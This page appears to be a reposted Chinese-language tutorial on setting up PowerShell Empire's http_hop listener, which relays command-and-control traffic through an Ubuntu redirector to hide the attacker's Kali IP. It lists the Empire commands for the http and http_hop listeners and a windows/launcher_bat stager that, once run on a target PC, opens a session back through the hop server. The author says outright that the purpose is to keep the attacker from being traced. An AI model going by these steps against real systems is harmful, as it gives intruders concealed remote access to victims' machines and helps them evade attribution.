zoukankan
html css js c++ java
使用PowerShell Empire(http_hop)隐藏IP
在本文中,我们学习了在PowerShell帝国中使用跃点有效负载。Empire拥有一个名为http_hop的内置侦听器,它使我们可以在获取代理后将流量重定向到另一个活动的侦听器之一。因此,名称将其从一个侦听器跳到另一个侦听器时进行跳转,以重定向流量。
与Metasploit相似,帝国中的跃点侦听器使用hop.php文件。当您激活跳侦听器时,它将生成三个PHP文件,这些文件将重定向您现有的侦听器。将所述文件放在您的跳转服务器(ubuntu)中,然后根据调解器(即我们的跃点监听器)获取会话,从而设置您的stager。
在下图中,您可以看到我们Kali的IP。现在,我们将尝试使用http_hop有效负载通过ubuntu进行Windows会话,以便隐藏我们自己的IP,即,基本上,我们的http_hop有效负载将帮助我们(攻击者)从被捕获的位置隐藏。
在下图中,您也可以看到我们的ubuntu的IP
。
现在,让我们开始吧。首先,对于该类型,我们应该有一个简单的http侦听器:
uselistener http
execute
现在,输入以下命令启动http_hop侦听器:
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111
在这里,我们给了RedirectListener,即来自http监听器的所有流量都将被定向到 http_hop 监听器。
执行上面的侦听器将创建三个文件,如上图所示。将这些文件传输到 Ubuntu的/ var / www / html位置,如下图所示:
现在,您可以在下图中看到我们激活了两个侦听器:
让我们通过键入以下命令来启动stager
:
usestager windows/launcher_bat
set Listener http_hop
execute
在目标PC中执行了bat文件后,我们将进行会话。现在,如果您观察到我们通过其获取会话的IP是 Ubuntu的,而不是Windows的,但是我们可以访问 Windows PC,同样,在Windows中,它将显示攻击的计算机是Ubuntu,而不是kali。因此,我们的http_hop是有效的。
总之, http_hop 侦听器的主要优点是,由于该侦听器隐藏了原始IP,因此可以帮助将攻击者识别为在目标PC上。
查看全文
相关阅读:
javascript面向对象(三)--继承
javascript面向对象(一)
jsp/servlet学习笔记(核心编程)mysql部分
jsp/servlet学习笔记(核心编程)servlet部分
没有为扩展名“.html”注册的生成提供程序
vs2012 mvc3项目ObjectContext与DBContext(转载)
反射与动态代理
spring-ioc
堆
哈希表
原文地址:https://www.cnblogs.com/sup3rman/p/13725093.html
最新文章
Django orm查询优化
pycharm专业版远程开发
JavaScript函数和作用域以及解构赋值
JavaScript的Map和Set以及iterable
JavaScript对象使用和判断循环语法
小程序的目录结构/配置介绍/视图层wxml数据绑定/双线程模型/启动流程
简单的存储过程
事务
ADO.Net 链接 Oracle 数据库
单例模式MVC
热门文章
MVC数据库迁移
LInQ的一些查询
分页Common
委托
创建实体类代码
mybatis传入list、array等数据集合的处理
javascript Dom总结
javascript引用类型
javascript变量作用域与内存
javascript面向对象(二)--创建对象
Copyright © 2011-2022 走看看